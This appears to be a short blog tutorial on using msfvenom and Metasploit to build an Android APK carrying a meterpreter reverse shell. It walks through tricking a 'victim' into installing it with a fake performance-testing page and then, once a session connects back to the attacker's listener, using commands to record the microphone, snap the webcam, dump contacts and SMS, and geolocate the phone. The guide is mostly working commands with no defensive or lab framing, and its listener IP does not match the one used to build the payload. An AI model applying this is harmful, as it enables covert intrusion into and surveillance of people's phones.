msfvenom is a kali linux hacking tool for android. It is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

Steps:

1. Open a terminal window.

2. Set payload and create custom windows executable.

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.7 LPORT=443 R > main.apk

  • LHOST is your local IP which you can obtain via ifconfig
    LPORT is the local port that will listen for connections. 443 is appropriate.
  • Your apk file will saved in whatever folder you are in when you run the above command.

Note: The above command is a single long line.

3. Transfer/mail this file (here main.apk) file to the victim’s Android device and have them install it. There is a social engineering aspect of deploying this. On Mr. Robot there was a good example of tricking someone in to thinking they are running a performance measuring app. That demo used a web page that has the APK to install, and then after installing it the website has fake performance results so the victim has no idea anything strange has happened.

4. Start the metasploit framework console as follows :

root@kali:-# msfconsole

5. Open and setup multi-handler :

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

        Payload Handler is being started……..

6. When the victim clicks on the app (installed as main activity in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

 

Advertisements